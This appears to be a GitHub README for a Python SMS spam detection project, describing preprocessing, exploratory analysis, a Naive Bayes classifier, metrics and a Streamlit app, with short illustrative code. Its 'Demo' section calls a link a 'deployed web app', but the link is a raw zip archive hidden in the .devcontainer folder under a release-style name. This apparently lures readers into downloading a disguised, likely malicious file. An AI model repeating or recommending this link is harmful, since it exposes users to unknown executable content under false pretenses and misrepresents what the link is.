SMS Spam Detection

Overview

The SMS Spam Detection project builds a machine learning model that predicts whether an SMS message is spam or ham (not spam). It is written in Python and uses Scikit-learn, Pandas, and NumPy to build and train the model, and Streamlit to deploy it as a web app that users can interact with directly.

Demo

You can try out the SMS Spam Detection model live by visiting the deployed web app https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip

Technology Used

Python
Scikit-learn (for machine learning)
Pandas (for data manipulation)
NumPy (for numerical computations)
Streamlit (for web deployment)
Matplotlib & Seaborn (for data visualization)
NLTK (for text preprocessing)

Features

Data collection and preprocessing
Exploratory Data Analysis (EDA)
Model building and evaluation
Web app deployment for real-time spam detection

Data Collection

The dataset used for this project comes from the SMS Spam Collection dataset available on Kaggle. It contains over 5,500 SMS messages that are labeled as spam or ham (non-spam). This dataset serves as the training and testing data for the model.

Data Cleaning and Preprocessing

The dataset undergoes several preprocessing steps to ensure the text data is ready for analysis:

Handling Missing Values: Null or missing data is handled appropriately.
Label Encoding: The target column (spam or ham) is label-encoded.
Text Preprocessing:
- Conversion of text to lowercase.
- Removal of special characters, numbers, and punctuation.
- Removal of stopwords (commonly used words with little meaning).
- Tokenization: splitting text into individual words.
- Lemmatization or stemming: reducing words to their base form.
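
The text preprocessing steps above can be sketched as a single function. This is a minimal, standard-library-only illustration, not the project's actual code: the short STOPWORDS set and the crude_stem helper are hypothetical stand-ins for NLTK's English stopword list and a real stemmer or lemmatizer, and the function name preprocess is assumed.

```python
import re

# Tiny illustrative stopword list (assumption); the project would use NLTK's full list.
STOPWORDS = {"a", "an", "and", "the", "is", "are", "to", "of", "in", "for",
             "you", "your", "this", "now"}

# Suffixes removed by the crude stemmer below, checked in this order.
SUFFIXES = ("ing", "ed", "es", "s")


def crude_stem(word: str) -> str:
    """Strip at most one common suffix; a rough stand-in for a real stemmer."""
    for suffix in SUFFIXES:
        # Keep at least three characters so short words are left alone.
        if word.endswith(suffix) and len(word) - len(suffix) >= 3:
            return word[: -len(suffix)]
    return word


def preprocess(text: str) -> list[str]:
    """Lowercase, drop non-letters, tokenize, remove stopwords, then stem."""
    text = text.lower()
    # Replace digits, punctuation, and special characters with spaces.
    text = re.sub(r"[^a-z\s]", " ", text)
    # Tokenize on whitespace.
    tokens = text.split()
    # Remove stopwords, then reduce each remaining word to a rough base form.
    return [crude_stem(t) for t in tokens if t not in STOPWORDS]


print(preprocess("WINNER!! You have won 2 FREE tickets, call now"))
```

Tokenization happens before stopword removal here because stopwords are matched word by word; the order of the remaining steps follows the list above.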

Exploratory Data Analysis (EDA)

Before building the model, exploratory data analysis (EDA) was performed to better understand the dataset:

Statistical summaries of message lengths and word counts.
Visualizations using bar charts, pie charts, and word clouds.
An analysis of word frequency and correlations between variables.

Visualizations help to understand the nature of spam vs non-spam messages and the distribution of message lengths.
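
As a rough illustration of the statistical summaries mentioned above, the sketch below computes the mean character and word counts per label. The function name length_summary and the three sample messages are hypothetical; the notebook presumably does the equivalent with Pandas on the full dataset.

```python
from statistics import mean


def length_summary(messages):
    """Return per-label message count, mean characters, and mean words.

    `messages` is an iterable of (label, text) pairs.
    """
    by_label = {}
    for label, text in messages:
        by_label.setdefault(label, []).append(text)

    summary = {}
    for label, texts in by_label.items():
        summary[label] = {
            "count": len(texts),
            "mean_chars": mean(len(t) for t in texts),
            "mean_words": mean(len(t.split()) for t in texts),
        }
    return summary


# Made-up sample data, for illustration only.
sample = [
    ("ham", "see you at lunch"),
    ("ham", "ok"),
    ("spam", "WIN a FREE prize now"),
]
for label, stats in length_summary(sample).items():
    print(label, stats)
```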

Model Building and Selection

Several machine learning algorithms were experimented with to build the most effective spam detection model:

Naive Bayes (MultinomialNB)
Logistic Regression
Random Forest
Support Vector Machine (SVM)
K-Nearest Neighbors (KNN)
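
Of the algorithms listed, multinomial Naive Bayes is simple enough to sketch from scratch. The class below is a teaching illustration with add-one (Laplace) smoothing over token lists; it is not the project's implementation, which uses Scikit-learn's MultinomialNB. The class name TinyMultinomialNB and the toy training data are assumptions.

```python
import math
from collections import Counter, defaultdict


class TinyMultinomialNB:
    """Multinomial Naive Bayes over token lists with add-one smoothing."""

    def fit(self, docs, labels):
        # Number of training documents per class, used for the class priors.
        self.class_counts = Counter(labels)
        # Per-class word frequencies.
        self.word_counts = defaultdict(Counter)
        for tokens, label in zip(docs, labels):
            self.word_counts[label].update(tokens)
        # Vocabulary across all classes, needed for the smoothing denominator.
        self.vocab = {w for counts in self.word_counts.values() for w in counts}
        return self

    def predict(self, tokens):
        total_docs = sum(self.class_counts.values())
        best_label, best_score = None, -math.inf
        for label, n_docs in self.class_counts.items():
            counts = self.word_counts[label]
            denom = sum(counts.values()) + len(self.vocab)
            # Work in log space to avoid underflow from multiplying small numbers.
            score = math.log(n_docs / total_docs)
            for w in tokens:
                if w in self.vocab:  # skip words never seen during training
                    score += math.log((counts[w] + 1) / denom)
            if score > best_score:
                best_label, best_score = label, score
        return best_label


# Toy data, for illustration only.
docs = [["free", "prize", "call"], ["win", "free", "cash"],
        ["see", "you", "lunch"], ["call", "me", "later"]]
labels = ["spam", "spam", "ham", "ham"]
clf = TinyMultinomialNB().fit(docs, labels)
print(clf.predict(["free", "cash"]))
print(clf.predict(["see", "you", "later"]))
```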

Each model is evaluated using accuracy, precision, recall, and F1-score. After comparing the models, Naive Bayes emerged as the best-performing one, judged by its precision and recall on the spam class.
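
For reference, the four metrics can be computed from true and predicted labels as in the sketch below, treating spam as the positive class. The function name classification_metrics and the example labels are illustrative; in practice Scikit-learn's metrics module provides the same quantities.

```python
def classification_metrics(y_true, y_pred, positive="spam"):
    """Compute accuracy, precision, recall, and F1 for one positive class."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(t == positive and p == positive for t, p in pairs)  # spam caught
    fp = sum(t != positive and p == positive for t, p in pairs)  # ham flagged as spam
    fn = sum(t == positive and p != positive for t, p in pairs)  # spam missed
    correct = sum(t == p for t, p in pairs)

    accuracy = correct / len(pairs)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall else 0.0)
    return {"accuracy": accuracy, "precision": precision,
            "recall": recall, "f1": f1}


# Made-up labels, for illustration only.
y_true = ["spam", "spam", "ham", "ham", "ham"]
y_pred = ["spam", "ham", "ham", "ham", "spam"]
print(classification_metrics(y_true, y_pred))
```

Precision matters most when a false alarm is costly (a legitimate message flagged as spam), while recall measures how much spam slips through.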

Web Deployment

The trained model is deployed as a Streamlit web application. Users can input SMS text into a simple text box, and the model will predict whether it’s spam or not.
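
The prediction step behind the text box might look roughly like the sketch below. It assumes the repository's vectorizer.pkl and model.pkl hold a fitted vectorizer and classifier with Scikit-learn-style transform and predict methods, and that label 1 means spam; the function names and the label convention are assumptions, and the Streamlit UI wiring is left out. The real app.py may also preprocess the text before vectorizing it.

```python
import pickle


def load_artifacts(vectorizer_path="vectorizer.pkl", model_path="model.pkl"):
    """Load the pickled vectorizer and model (file names taken from the repository)."""
    with open(vectorizer_path, "rb") as f:
        vectorizer = pickle.load(f)
    with open(model_path, "rb") as f:
        model = pickle.load(f)
    return vectorizer, model


def classify(text, vectorizer, model, spam_label=1):
    """Vectorize one message and map the model's prediction to a readable label.

    `spam_label` is the encoded value assumed to mean spam.
    """
    features = vectorizer.transform([text])
    prediction = model.predict(features)[0]
    return "Spam" if prediction == spam_label else "Not spam"
```

With the two pickle files in the working directory, usage would be `vectorizer, model = load_artifacts()` followed by `classify("some message", vectorizer, model)`.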

To run the app locally:

Clone the repository.

Install the necessary dependencies using:

pip install -r requirements.txt

Launch the app with Streamlit:

streamlit run app.py

Open your browser and navigate to http://localhost:8501 to interact with the model.

Usage

To use the SMS Spam Detection model on your own machine:

Clone the repository:

git clone https://github.com/rushangchandekar/SMS-Spam-Detection.git
cd SMS-Spam-Detection

Install the required Python packages:

pip install -r requirements.txt

Run the Streamlit app:

streamlit run app.py

Visit http://localhost:8501 in your browser to access the web application.

Contributing

Contributions are welcome! If you have ideas for improvements or encounter any issues, feel free to open an issue or submit a pull request.

To contribute:

Fork this repository.
Make your changes.
Submit a pull request with a clear description of your changes.
